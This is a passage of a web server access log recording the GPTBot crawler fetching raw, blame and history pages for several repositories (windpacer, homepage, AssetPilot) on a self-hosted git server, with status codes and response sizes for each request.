AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:13:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 2464009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:13:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 4330017] [Gzip 20.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:13:54:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 9910] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:13:54:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:54:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 2009110] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:54:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 9496] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:13:54:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 10962886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:13:54:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:54:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:54:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" +[17/Feb/2026:13:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" +[17/Feb/2026:13:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11179] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" +[17/Feb/2026:13:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11270] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" +[17/Feb/2026:13:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" +[17/Feb/2026:13:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" +[17/Feb/2026:13:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9848] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" +[17/Feb/2026:13:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 10128] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 10108] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" +[17/Feb/2026:13:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" +[17/Feb/2026:13:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10352] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" +[17/Feb/2026:13:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" +[17/Feb/2026:13:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" +[17/Feb/2026:13:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14296] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" +[17/Feb/2026:13:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" +[17/Feb/2026:13:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" +[17/Feb/2026:13:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10817] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" +[17/Feb/2026:13:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10851] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14658] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" +[17/Feb/2026:13:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14957] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" +[17/Feb/2026:13:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" +[17/Feb/2026:13:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:13:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10170] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" +[17/Feb/2026:13:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" +[17/Feb/2026:13:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699387] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429930] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699327] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692350] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498816] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641783] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] 